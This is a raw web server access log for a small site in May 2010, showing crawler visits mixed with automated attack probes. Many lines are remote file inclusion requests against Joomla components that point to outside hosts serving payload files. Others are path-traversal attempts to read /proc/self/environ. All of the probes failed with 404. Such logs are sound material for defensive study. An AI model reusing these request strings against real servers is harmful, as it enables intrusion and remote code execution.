67.201.34.227 - - [07/May/2010:06:58:01 -0700] "GET /logs//components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
67.201.34.227 - - [07/May/2010:06:58:02 -0700] "GET /components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
67.195.110.174 - - [07/May/2010:07:19:51 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [07/May/2010:07:20:07 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
207.46.195.230 - - [07/May/2010:07:51:56 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
207.46.195.230 - - [07/May/2010:07:52:59 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
61.67.201.187 - - [07/May/2010:07:57:55 -0700] "GET /logs/access_100206.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
61.67.201.187 - - [07/May/2010:07:57:55 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
61.67.201.187 - - [07/May/2010:07:57:55 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
61.67.201.187 - - [07/May/2010:07:58:23 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
61.67.201.187 - - [07/May/2010:07:58:23 -0700] "GET /logs/access_100206.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
61.67.201.187 - - [07/May/2010:07:58:23 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
95.108.150.235 - - [07/May/2010:09:11:31 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [07/May/2010:09:11:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [07/May/2010:09:11:33 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [07/May/2010:09:11:34 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [07/May/2010:09:11:35 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [07/May/2010:09:11:36 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
174.121.225.9 - - [07/May/2010:10:58:41 -0700] "GET /*.php?option=com_joomla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:11:32:59 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:11:32:59 -0700] "GET /logs/access_100206.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:11:32:59 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:11:38:52 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:11:38:52 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:11:38:52 -0700] "GET /logs/access_091205.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:12:05:55 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:12:05:55 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:12:05:55 -0700] "GET /logs/access_091205.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:12:11:27 -0700] "GET /logs/access_091205.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
217.16.18.219 - - [07/May/2010:12:34:58 -0700] "GET /logs/index.php?option=com_googlebase&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
217.16.18.219 - - [07/May/2010:12:34:58 -0700] "GET /index.php?option=com_googlebase&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
62.128.135.38 - - [07/May/2010:12:35:35 -0700] "GET /home.php?pagina=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
72.29.80.127 - - [07/May/2010:12:35:41 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
174.123.124.82 - - [07/May/2010:12:35:44 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
217.172.150.13 - - [07/May/2010:12:36:41 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.virtualsupplynet.com"
65.49.28.194 - - [07/May/2010:12:37:18 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.virtualsupplynet.com"
75.25.154.162 - - [07/May/2010:12:37:25 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
217.16.18.219 - - [07/May/2010:12:39:00 -0700] "GET /logs/index.php?option=com_dadamail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
217.16.18.219 - - [07/May/2010:12:39:01 -0700] "GET /index.php?option=com_dadamail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
194.108.112.112 - - [07/May/2010:12:39:09 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:12:41:01 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:12:41:01 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:12:41:01 -0700] "GET /logs/access_091205.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
217.16.18.219 - - [07/May/2010:12:41:35 -0700] "GET /logs/index.php?option=com_dadamail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
217.16.18.219 - - [07/May/2010:12:41:35 -0700] "GET /index.php?option=com_dadamail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
217.16.18.219 - - [07/May/2010:12:41:53 -0700] "GET /index.php?option=com_googlebase&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
210.50.189.221 - - [07/May/2010:12:44:29 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
62.128.135.38 - - [07/May/2010:12:46:19 -0700] "GET /logs/access_091205.log/home.php?pagina=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
62.128.135.38 - - [07/May/2010:12:46:19 -0700] "GET /home.php?pagina=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
62.128.135.38 - - [07/May/2010:12:46:19 -0700] "GET /logs/home.php?pagina=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
174.123.124.82 - - [07/May/2010:12:51:16 -0700] "GET /logs/access_091205.log//home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
174.123.124.82 - - [07/May/2010:12:51:16 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
174.123.124.82 - - [07/May/2010:12:51:16 -0700] "GET /logs//home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:12:52:34 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:12:52:34 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.174.185.131 - - [07/May/2010:12:52:34 -0700] "GET /logs/access_091205.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
72.29.80.127 - - [07/May/2010:12:53:42 -0700] "GET /logs/access_091205.log//home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
72.29.80.127 - - [07/May/2010:12:53:42 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
72.29.80.127 - - [07/May/2010:12:53:42 -0700] "GET /logs//home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
217.172.150.13 - - [07/May/2010:12:55:21 -0700] "GET /logs/access_091205.log//home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.virtualsupplynet.com"
217.172.150.13 - - [07/May/2010:12:55:21 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.virtualsupplynet.com"
217.172.150.13 - - [07/May/2010:12:55:21 -0700] "GET /logs//home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.virtualsupplynet.com"
217.16.18.219 - - [07/May/2010:13:03:05 -0700] "GET /logs/access_100206.log/index.php?option=com_googlebase&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
217.16.18.219 - - [07/May/2010:13:03:05 -0700] "GET /index.php?option=com_googlebase&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
217.16.18.219 - - [07/May/2010:13:03:06 -0700] "GET /logs/index.php?option=com_googlebase&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
194.108.112.112 - - [07/May/2010:13:04:21 -0700] "GET /logs/access_091205.log//home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
194.108.112.112 - - [07/May/2010:13:04:21 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
194.108.112.112 - - [07/May/2010:13:04:22 -0700] "GET /logs//home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
210.50.189.221 - - [07/May/2010:13:09:20 -0700] "GET /logs/access_091205.log//home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
210.50.189.221 - - [07/May/2010:13:09:21 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
210.50.189.221 - - [07/May/2010:13:09:21 -0700] "GET /logs//home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
81.214.249.169 - - [07/May/2010:13:16:36 -0700] "GET /logs/access_100506.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
81.214.249.169 - - [07/May/2010:13:16:37 -0700] "GET /logs/access_100507.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
65.49.28.194 - - [07/May/2010:13:17:02 -0700] "GET /logs/access_091205.log//home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.virtualsupplynet.com"
65.49.28.194 - - [07/May/2010:13:17:03 -0700] "GET /home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.virtualsupplynet.com"
65.49.28.194 - - [07/May/2010:13:17:03 -0700] "GET /logs//home.php?content=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.virtualsupplynet.com"
77.222.56.62 - - [07/May/2010:16:08:22 -0700] "GET /logs/access_100206.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://raml.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
77.222.56.62 - - [07/May/2010:16:08:22 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://raml.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
77.222.56.62 - - [07/May/2010:16:08:22 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://raml.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
77.222.56.62 - - [07/May/2010:16:08:49 -0700] "GET /logs/access_100130.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://raml.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
208.80.193.36 - - [07/May/2010:16:46:56 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; Hotbar 10.0.368.0)" "www.virtualsupplynet.com"